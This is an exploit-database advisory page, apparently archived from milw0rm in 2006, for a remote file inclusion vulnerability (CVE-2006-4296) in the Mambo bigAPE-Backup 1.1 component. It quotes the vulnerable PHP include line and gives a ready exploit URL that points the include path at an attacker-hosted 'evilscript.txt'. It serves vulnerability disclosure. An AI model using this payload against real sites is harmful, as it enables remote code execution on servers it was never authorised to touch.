![$site['logo_alt']](/img/neosense-logo.png){kind=logo}
NeoSense Mambo Component bigAPE-Backup 1.1 - Remote File Inclusion
Author: mdx type: webapps platform: php port: date_added: 2006-08-18 date_updated: 2017-10-07 verified: 1 codes: OSVDB-28032;CVE-2006-4296 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comcom_babackup_1.1.zip raw file: 2225.txt
/* Notes: globals bypass with a multipart/form-data POST * PHP4 <= 4.4.0 * PHP5 <= 5.0.5 http://www.hardened-php.net/globals-problem /str0ke */ #################################################### # # # C Y BE R - W A R R i O R T I M # # # #################################################### mambo com_babackup (1.1) Component (mosConfig_absolute_path) Remote File Inclusion Vulnerabilities #################################################### Author: mdx #################################################### Class : Remote #################################################### cont@ct: bilkopat[at]hotmail[dot]com #################################################### Code: Tar.php? require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_babackup/classes/PEAR.php' ); Exploit: http://www.site.com/[path]/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://site.com/evilscript.txt? #################################################### Greetz: Cyber-warrior TIM USERS #################################################### download link: http://mamboxchange.com/frs/download.php/5072/com_babackup_1.1.zip # milw0rm.com [2006-08-19]